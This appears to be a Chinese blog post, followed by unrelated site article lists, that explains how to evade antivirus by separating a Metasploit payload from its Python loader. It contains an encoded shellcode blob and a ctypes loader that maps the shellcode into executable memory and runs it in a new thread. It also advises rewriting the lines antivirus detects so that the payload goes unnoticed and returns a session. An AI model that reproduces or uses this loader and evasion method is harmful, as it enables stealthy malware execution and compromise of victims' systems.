通过Python实现Payload分离免杀过程详解


Posted in Python onJuly 13, 2020

缺点:

编译成exe以后体积过大

实现:

msf生成shellcode代码:

通过Python实现Payload分离免杀过程详解

将payload给copy下来,去除引号。

\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42
\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33
\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66
\x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x4a\x53
\x56\x34\x74\x53\x45\x49\x74\x4b\x50\x49\x74\x4d\x45\x58\x6a
\x6a\x53\x41\x48\x52\x55\x59\x74\x5a\x49\x41\x48\x54\x69\x30
\x6b\x59\x34\x7a\x70\x4a\x69\x7a\x53\x4c\x41\x64\x59\x78\x2f
\x36\x7a\x42\x7a\x77\x30\x42\x78\x7a\x6a\x67\x64\x66\x59\x44
\x66\x66\x67\x37\x66\x53\x52\x31\x35\x46\x69\x4c\x57\x43\x51
\x42\x30\x32\x61\x4c\x44\x45\x75\x4c\x57\x42\x77\x42\x30\x34
\x73\x45\x69\x77\x48\x51\x69\x55\x51\x6b\x4a\x46\x74\x62\x59
\x56\x6c\x61\x55\x66\x2f\x67\x58\x31\x39\x61\x69\x78\x4c\x72
\x6a\x56\x31\x6f\x4d\x7a\x49\x41\x41\x47\x68\x33\x63\x7a\x4a
\x66\x56\x47\x68\x4d\x64\x79\x59\x48\x69\x65\x6a\x2f\x30\x4c
\x69\x51\x41\x51\x41\x41\x4b\x63\x52\x55\x55\x47\x67\x70\x67
\x47\x73\x41\x2f\x39\x56\x71\x43\x6d\x6a\x41\x71\x41\x4d\x38
\x61\x41\x49\x41\x44\x51\x57\x4a\x35\x6c\x42\x51\x55\x46\x42
\x41\x55\x45\x42\x51\x61\x4f\x6f\x50\x33\x2b\x44\x2f\x31\x5a
\x64\x71\x45\x46\x5a\x58\x61\x4a\x6d\x6c\x64\x47\x48\x2f\x31
\x59\x58\x41\x64\x41\x72\x2f\x54\x67\x68\x31\x37\x4f\x68\x6e
\x41\x41\x41\x41\x61\x67\x42\x71\x42\x46\x5a\x58\x61\x41\x4c
\x5a\x79\x46\x2f\x2f\x31\x59\x50\x34\x41\x48\x34\x32\x69\x7a
\x5a\x71\x51\x47\x67\x41\x45\x41\x41\x41\x56\x6d\x6f\x41\x61
\x46\x69\x6b\x55\x2b\x58\x2f\x31\x5a\x4e\x54\x61\x67\x42\x57
\x55\x31\x64\x6f\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67
\x41\x66\x53\x68\x59\x61\x41\x42\x41\x41\x41\x42\x71\x41\x46
\x42\x6f\x43\x79\x38\x50\x4d\x50\x2f\x56\x56\x32\x68\x31\x62
\x6b\x31\x68\x2f\x39\x56\x65\x58\x76\x38\x4d\x4a\x41\x2b\x46
\x63\x50\x2f\x2f\x2f\x2b\x6d\x62\x2f\x2f\x2f\x2f\x41\x63\x4d
\x70\x78\x6e\x58\x42\x77\x37\x76\x77\x74\x61\x4a\x57\x61\x67
\x42\x54\x2f\x39\x55\x3d

将自己的代码放入第3行的shell_code位置。

import ctypes,base64
 
encode_shellcode = "shell_code"
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

以上代码是绝对会被查杀的,但是可以通过修改代码绕过。思路如下,先查找杀软查杀哪里,再修改杀软查杀的代码,同时保证正常运行。提示一下,查杀的代码再5-6行之间,对其进行修改即可。

返回session:

通过Python实现Payload分离免杀过程详解

免杀效果:

通过Python实现Payload分离免杀过程详解

参考资料:

https://github.com/TideSec/BypassAntiVirus

https://micro8.gitbook.io/micro8/

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

Python 相关文章推荐
巧用Python装饰器 免去调用父类构造函数的麻烦
May 18 Python
windows下安装python的C扩展编译环境(解决Unable to find vcvarsall.bat)
Feb 21 Python
python查询mysql,返回json的实例
Mar 26 Python
使用50行Python代码从零开始实现一个AI平衡小游戏
Nov 21 Python
python爬虫之urllib,伪装,超时设置,异常处理的方法
Dec 19 Python
Django组件cookie与session的具体使用
Jun 05 Python
python定位xpath 节点位置的方法
Aug 27 Python
python实现的按要求生成手机号功能示例
Oct 08 Python
手把手教你进行Python虚拟环境配置教程
Feb 03 Python
Python unittest 自动识别并执行测试用例方式
Mar 09 Python
Python configparser模块封装及构造配置文件
Aug 07 Python
关于PyCharm安装后修改路径名称使其可重新打开的问题
Oct 20 Python
python上selenium的弹框操作实现
Jul 13 #Python
python如何导入依赖包
Jul 13 #Python
python入门:argparse浅析 nargs='+'作用
Jul 12 #Python
浅谈Python 命令行参数argparse写入图片路径操作
Jul 12 #Python
Python实现封装打包自己写的代码,被python import
Jul 12 #Python
Django封装交互接口代码
Jul 12 #Python
在django中实现choices字段获取对应字段值
Jul 12 #Python
You might like
屏蔽浏览器缓存另类方法
2006/10/09 PHP
PHP使用Curl实现模拟登录及抓取数据功能示例
2018/04/27 PHP
javascript 禁止复制网页
2009/06/11 Javascript
选择TreeView控件的树状数据节点的JS方法(jquery)
2010/02/06 Javascript
禁用页面部分JavaScript不是全部而是部分
2014/09/03 Javascript
javascript匿名函数实例分析
2014/11/18 Javascript
javascript数组遍历for与for in区别详解
2014/12/04 Javascript
jQuery实现类似淘宝网图片放大效果的方法
2015/07/08 Javascript
不依赖Flash和任何JS库实现文本复制与剪切附源码下载
2015/10/09 Javascript
深入理解关于javascript中apply()和call()方法的区别
2016/04/12 Javascript
jQuery Raty 一款不错的星级评分插件
2016/08/24 Javascript
Three.js利用性能插件stats实现性能监听的方法
2017/09/25 Javascript
微信 jssdk 签名错误invalid signature的解决方法
2019/01/14 Javascript
vue新建项目并配置标准路由过程解析
2019/12/09 Javascript
package.json各个属性说明详解
2020/03/11 Javascript
Node.js web 应用如何封装到Docker容器中
2020/09/01 Javascript
[52:37]完美世界DOTA2联赛循环赛 Forest vs DM BO2第一场 10.29
2020/10/29 DOTA
自动化Nginx服务器的反向代理的配置方法
2015/06/28 Python
django站点管理详解
2017/12/12 Python
对python中的pop函数和append函数详解
2018/05/04 Python
python  创建一个保留重复值的列表的补码
2018/10/15 Python
NumPy 数组使用大全
2019/04/25 Python
Django多数据库的实现过程详解
2019/08/01 Python
Python反爬虫伪装浏览器进行爬虫
2020/02/28 Python
python3实现往mysql中插入datetime类型的数据
2020/03/02 Python
Python3爬虫关于代理池的维护详解
2020/07/30 Python
pandas map(),apply(),applymap()区别解析
2021/02/24 Python
html5用video标签流式加载的实现
2020/05/20 HTML / CSS
社区服务活动小结
2014/07/08 职场文书
2014年志愿者工作总结
2014/11/20 职场文书
车间统计员岗位职责
2015/04/14 职场文书
食品安全主题班会
2015/08/13 职场文书
大学生干部培训心得体会
2016/01/06 职场文书
《烈火英雄》观后感:致敬和平时代的英雄
2019/11/11 职场文书
Mysql中一千万条数据怎么快速查询
2021/12/06 MySQL
MySQL慢查询优化解决问题
2022/03/17 MySQL